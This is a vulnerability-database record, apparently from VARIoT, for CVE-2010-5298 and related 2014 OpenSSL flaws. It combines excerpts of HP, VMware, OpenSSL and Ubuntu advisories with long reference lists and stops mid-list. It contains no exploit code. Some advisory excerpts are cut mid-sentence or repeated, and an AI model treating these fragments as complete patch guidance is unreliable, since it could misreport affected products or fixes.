\nLeftHand OS v12.0 - Patches 50016-00 and 50017-00 \nLeftHand OS v12.5 - Patch 55016-00 \nLeftHand OS v12.6 - Patch 56002-00 \n\n**Notes:**\n\nThese patches enable TLSv1.2 protocol and upgrades the OpenSSL RPM revision\nto OpenSSL v1.0.1e 48. \nThese patches migrate Certificate Authority Hashing Algorithm from a weak\nhashing algorithm SHA1 to the stronger hashing algorithm SHA256. Summary\n\n VMware product updates address OpenSSL security vulnerabilities. Relevant Releases\n\n ESXi 5.5 prior to ESXi550-201406401-SG\n\n\n3. Problem Description\n\n a. \n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n\n has assigned the names CVE-2014-0224, CVE-2014-0198, \n CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to\n these issues. The most important of these issues is \n CVE-2014-0224. \n\n CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to\n be of moderate severity. Exploitation is highly unlikely or is\n mitigated due to the application configuration. \n\n CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL \n Security Advisory (see Reference section below), do not affect\n any VMware products. For readability\n the affected products have been split into 3 tables below, \n based on the different client-server configurations and\n deployment scenarios. Applying these patches to \n affected servers will mitigate the affected clients (See Table 1\n below). can be mitigated by using a secure network such as \n VPN (see Table 2 below). \n \n Clients and servers that are deployed on an isolated network are\n less exposed to CVE-2014-0224 (see Table 3 below). The affected\n products are typically deployed to communicate over the\n management network. \n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected Servers in Table 1 below as these patches become\n available. Patching these servers will remove the ability to\n exploit the vulnerability described in CVE-2014-0224 on both\n clients and servers. VMware recommends customers consider \n applying patches to products listed in Table 2 \u0026 3 as required. \n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n ESXi 5.5 ESXi ESXi550-\n 201406401-SG \n\n Big Data Extensions 1.1 patch pending \n Charge Back Manager 2.6 patch pending \n\n Horizon Workspace Server \n GATEWAY 1.8.1 patch pending \n Horizon Workspace Server \n GATEWAY 1.5 patch pending \n\n Horizon Workspace Server \n DATA 1.8.1 patch pending \n\n Horizon Mirage Edge Gateway 4.4.2 patch pending \n Horizon View 5.3.1 patch pending \n\n Horizon View Feature Pack 5.3 SP2 patch pending \n\n NSX for Multi-Hypervisor 4.1.2 patch pending \n NSX for Multi-Hypervisor 4.0.3 patch pending \n NSX for vSphere 6.0.4 patch pending \n NVP 3.2.2 patch pending \n vCAC 6.0.1 patch pending \n\n vCloud Networking and Security 5.5.2 \t\t patch pending \n vCloud Networking and Security 5.1.2 \t\t patch pending \n\n vFabric Web Server 5.3.4 patch pending \n\n vCHS - DPS-Data Protection 2.0 patch pending \n Service\n\n Table 2\n ========\n Affected clients running a vulnerable version of OpenSSL 0.9.8 \n or 1.0.1 and communicating over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCSA 5.5 patch pending \n vCSA 5.1 patch pending \n vCSA 5.0 patch pending \n\n\n ESXi 5.1 ESXi patch pending \n ESXi 5.0 ESXi patch pending \n\n Workstation 10.0.2 any patch pending \n Workstation 9.0.3 any patch pending \n Fusion 6.x OSX patch pending \n Fusion 5.x OSX patch pending \n Player 10.0.2 any patch pending \n Player 9.0.3 any patch pending \n\n Chargeback Manager 2.5.x patch pending \n\n Horizon Workspace Client for 1.8.1 OSX patch pending \n Mac\n Horizon Workspace Client for 1.5 OSX patch pending \n Mac\n Horizon Workspace Client for 1.8.1 Windows patch pending \n Windows \n Horizon Workspace Client for 1.5 Windows patch pending \n\n OVF Tool 3.5.1 patch pending \n OVF Tool 3.0.1 patch pending \n\n vCenter Operations Manager 5.8.1 patch pending \n\n vCenter Support Assistant 5.5.0 patch pending \n vCenter Support Assistant 5.5.1 patch pending \n \n vCD 5.1.2 patch pending \n vCD 5.1.3 patch pending \n vCD 5.5.1.1 patch pending \n vCenter Site Recovery Manager 5.0.3.1 patch pending \n\n Table 3\n =======\n The following table lists all affected clients running a\n vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating\n over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCenter Server 5.5 any patch pending\n vCenter Server 5.1 any patch pending\n vCenter Server 5.0 any patch pending\n\n Update Manager 5.5 Windows patch pending\n Update Manager 5.1 Windows patch pending\n Update Manager 5.0 Windows patch pending \n\n Config Manager (VCM) 5.6 patch pending \n\n Horizon View Client 5.3.1 patch pending \n Horizon View Client 4.x patch pending\n Horizon Workspace 1.8.1 patch pending \n Horizon Workspace 1.5 patch pending \n \n \n ITBM Standard 1.0.1 patch pending \n ITBM Standard 1.0 patch pending \n \n Studio 2.6.0.0 patch pending \n \n Usage Meter 3.3 patch pending \n vCenter Chargeback Manager 2.6 patch pending \n vCenter Converter Standalone 5.5 patch pending \n vCenter Converter Standalone 5.1 patch pending \n vCD (VCHS) 5.6.2 patch pending \n \n vCenter Site Recovery Manager 5.5.1 patch pending \n vCenter Site Recovery Manager 5.1.1 patch pending\n\n vFabric Application Director 5.2.0 patch pending \n vFabric Application Director 5.0.0 patch pending \n View Client 5.3.1 patch pending \n View Client 4.x patch pending\n VIX API 5.5 patch pending \n VIX API 1.12 patch pending \n \n vMA (Management Assistant) 5.1.0.1 patch pending \n \n\n VMware Data Recovery 2.0.3 patch pending \n \n VMware vSphere CLI 5.5 patch pending \n \n vSphere Replication 5.5.1 patch pending \n vSphere Replication 5.6 patch pending \n vSphere SDK for Perl 5.5 patch pending \n vSphere Storage Appliance 5.5.1 patch pending \n vSphere Storage Appliance 5.1.3 patch pending \n vSphere Support Assistant 5.5.1 patch pending \n vSphere Support Assistant 5.5.0 patch pending\n vSphere Virtual Disk 5.5 patch pending \n Development Kit \n vSphere Virtual Disk 5.1 patch pending \n Development Kit\n vSphere Virtual Disk 5.0 patch pending \n Development Kit\n \n 4. Solution\n\n ESXi 5.5\n ----------------------------\n\n Download:\n https://www.vmware.com/patchmgr/download.portal\n\n Release Notes and Remediation Instructions:\n http://kb.vmware.com/kb/2077359\n\n 5. Change Log\n\n 2014-06-10 VMSA-2014-0006\n Initial security advisory in conjunction with the release of\n ESXi 5.5 updates on 2014-06-10\n\n- -----------------------------------------------------------------------\n \n7. Contact\n\n E-mail list for product security notifications and announcements:\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n This Security Advisory is posted to the following lists:\n\n security-announce at lists.vmware.com\n bugtraq at securityfocus.com\n fulldisclosure at seclists.org\n\n E-mail: security at vmware.com\n PGP key at: http://kb.vmware.com/kb/1055\n\n VMware Security Advisories\n http://www.vmware.com/security/advisories\n\n VMware Security Response Policy\n https://www.vmware.com/support/policies/security_response.html\n\n VMware Lifecycle Support Phases\n https://www.vmware.com/support/policies/lifecycle.html\n \n Twitter\n https://twitter.com/VMwareSRC\n\n Copyright 2014 VMware Inc. All rights reserved. \n\nThe attack can only be performed between a vulnerable client *and*\nserver. \n\nThanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 1st May\n2014 via JPCERT/CC. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team partly based\non an original patch from KIKUCHI Masashi. \n\nDTLS recursion flaw (CVE-2014-0221)\n====================================\n\nBy sending an invalid DTLS handshake to an OpenSSL DTLS client the code\ncan be made to recurse eventually crashing in a DoS attack. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This\nissue was reported to OpenSSL on 9th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to J\u00fcri Aedla for reporting this issue. This issue was\nreported to OpenSSL on 23rd April 2014 via HP ZDI. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. This flaw\nonly affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is\nenabled, which is not the default and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. The fix was developed by\nMatt Caswell of the OpenSSL development team. \nThis flaw only affects multithreaded applications using OpenSSL 1.0.0\nand 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the\ndefault and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8za\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThanks to Felix Gr\u00f6bert and Ivan Fratri\u0107 at Google for discovering this\nissue. This issue was reported to OpenSSL on 28th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOther issues\n============\n\nOpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for\nCVE-2014-0076: Fix for the attack described in the paper \"Recovering\nOpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack\"\nReported by Yuval Yarom and Naomi Benger. This issue was previously\nfixed in OpenSSL 1.0.1g. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttp://www.openssl.org/news/secadv_20140605.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nHP Systems Insight Manager v7.3 Hotfix kit\nHP Systems Insight Manager v7.2 Hotfix kit\n\nhttp://h18013.www1.hp.com/products/servers/management/hpsim/download.html\n\nNOTE: No reboot of the system is required after applying the HP SIM Hotfix\nkit. ============================================================================\nUbuntu Security Notice USN-2192-1\nMay 05, 2014\n\nopenssl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.10\n- Ubuntu 12.04 LTS\n\nSummary:\n\nOpenSSL could be made to crash if it received specially crafted network\ntraffic. \n(CVE-2010-5298)\n\nIt was discovered that OpenSSL incorrectly handled memory in the\ndo_ssl3_write() function. \n(CVE-2014-0198)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.1\n\nUbuntu 13.10:\n libssl1.0.0 1.0.1e-3ubuntu1.3\n\nUbuntu 12.10:\n libssl1.0.0 1.0.1c-3ubuntu2.8\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.13\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes", "sources": [ { "db": "NVD", "id": "CVE-2010-5298" }, { "db": "BID", "id": "66801" }, { "db": "VULMON", "id": "CVE-2010-5298" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "126927" }, { "db": "PACKETSTORM", "id": "130188" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126481" }, { "db": "PACKETSTORM", "id": "126930" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2010-5298", "trust": 2.7 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 1.4 }, { "db": "BID", "id": "66801", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10075", "trust": 1.4 }, { "db": "SECUNIA", "id": "59490", "trust": 1.1 }, { "db": "SECUNIA", "id": "59666", "trust": 1.1 }, { "db": "SECUNIA", "id": "59440", "trust": 1.1 }, { "db": "SECUNIA", "id": "59437", "trust": 1.1 }, { "db": "SECUNIA", "id": "58977", "trust": 1.1 }, { "db": "SECUNIA", "id": "59301", "trust": 1.1 }, { "db": "SECUNIA", "id": "59450", "trust": 1.1 }, { "db": "SECUNIA", "id": "59287", "trust": 1.1 }, { "db": "SECUNIA", "id": "59342", "trust": 1.1 }, { "db": "SECUNIA", "id": "59721", "trust": 1.1 }, { "db": "SECUNIA", "id": "59413", "trust": 1.1 }, { "db": "SECUNIA", "id": "58337", "trust": 1.1 }, { "db": "SECUNIA", "id": "59655", "trust": 1.1 }, { "db": "SECUNIA", "id": "58713", "trust": 1.1 }, { "db": "SECUNIA", "id": "59669", "trust": 1.1 }, { "db": "SECUNIA", "id": "59162", "trust": 1.1 }, { "db": "SECUNIA", "id": "58939", "trust": 1.1 }, { "db": "SECUNIA", "id": "59300", "trust": 1.1 }, { "db": "SECUNIA", "id": "59438", "trust": 1.1 }, { "db": "OPENWALL", "id": "OSS-SECURITY/2014/04/13/1", "trust": 1.1 }, { "db": "ICS CERT", "id": "ICSA-14-198-03G", "trust": 0.4 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10643", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03F", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03B", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03C", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03D", "trust": 0.3 }, { "db": "MCAFEE", "id": "SB10071", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2010-5298", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127362", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127923", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127807", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126927", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130188", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "131044", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "140720", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127326", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127045", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126961", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128001", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126481", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126930", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2010-5298" }, { "db": "BID", "id": "66801" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "126927" }, { "db": "PACKETSTORM", "id": "130188" }, { "db": "PACKETSTORM", "id": "131044" }, { "db": "PACKETSTORM", "id": "140720" }, { "db": "PACKETSTORM", "id": "127326" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "128001" }, { "db": "PACKETSTORM", "id": "126481" }, { "db": "PACKETSTORM", "id": "126930" }, { "db": "NVD", "id": "CVE-2010-5298" } ] }, "id": "VAR-201404-0008", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.416493127826087 }, "last_update_date": "2024-07-23T20:53:19.246000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/07/10/fireeye_patches_os_torpedo_exploitdb_disclosure/" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2192-1" }, { "title": "Debian Security Advisories: DSA-2908-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=438bf64e25a46a5ac11098b5720d1bb6" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0198 Null pointer dereference bug in OpenSSL 1.0.1g and earlier", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=94b6140bb563b66b3bcd98992e854bf3" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0076", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1fc1fc75c3cab4aa04eb437a09a1da4f" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2010-5298" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-362", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2010-5298" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 1.4, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 1.4, "url": "http://www.fortiguard.com/advisory/fg-ir-14-018/" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 1.4, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677836" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676529" }, { "trust": 1.4, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 1.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5298" }, { "trust": 1.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0198" }, { "trust": 1.1, "url": "http://openwall.com/lists/oss-security/2014/04/13/1" }, { "trust": 1.1, "url": "http://svnweb.freebsd.org/ports/head/security/openssl/files/patch-ssl-s3_pkt.c?revision=351191\u0026view=markup" }, { "trust": 1.1, "url": "http://ftp.openbsd.org/pub/openbsd/patches/5.5/common/004_openssl.patch.sig" }, { "trust": 1.1, "url": "http://www.tedunangst.com/flak/post/analysis-of-openssl-freelist-reuse" }, { "trust": 1.1, "url": "https://rt.openssl.org/ticket/display.html?id=3265\u0026user=guest\u0026pass=guest" }, { "trust": 1.1, "url": "http://www.openbsd.org/errata55.html#004_openssl" }, { "trust": 1.1, "url": "https://rt.openssl.org/ticket/display.html?id=2167\u0026user=guest\u0026pass=guest" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/66801" }, { "trust": 1.1, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 1.1, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.1, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 1.1, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=141658880509699\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140544599631400\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.1, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.1, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.1, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.1, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:090" }, { "trust": 1.1, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 1.1, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 1.1, "url": "http://security.gentoo.org/glsa/glsa-201407-05.xml" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59440" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59437" }, { "trust": 1.1, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58713" }, { "trust": 1.1, "url": "http://secunia.com/advisories/58337" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136473.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136470.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=kb29195" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629" }, { "trust": 1.1, "url": "http://advisories.mageia.org/mgasa-2014-0187.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0224" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0221" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3470" }, { "trust": 1.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0195" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0076" }, { "trust": 0.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03g" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05301946" }, { "trust": 0.4, "url": "https://rhn.redhat.com/errata/rhsa-2014-0625.html" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.4, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.4, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.3, "url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10045" }, { "trust": 0.3, "url": "http://seclists.org/oss-sec/2014/q2/102" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10629\u0026cat=sirt_1\u0026actp=list\u0026showdraft=false" }, { "trust": 0.3, "url": "http://blogs.citrix.com/2014/06/06/citrix-security-advisory-for-openssl-vulnerabilities-june-2014/" }, { "trust": 0.3, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2010_5298_race_conditions" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2014/aug/att-93/esa-2014-079.txt" }, { "trust": 0.3, "url": "http://www.freebsd.org/security/advisories/freebsd-sa-14:09.openssl.asc" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10643\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181245" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21686583" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15328.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100181099" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100180978" }, { "trust": 0.3, "url": "http://ics-cert.us-cert.gov/advisories/icsa-14-198-03" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-198-03d" }, { "trust": 0.3, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-094-04" }, { "trust": 0.3, "url": 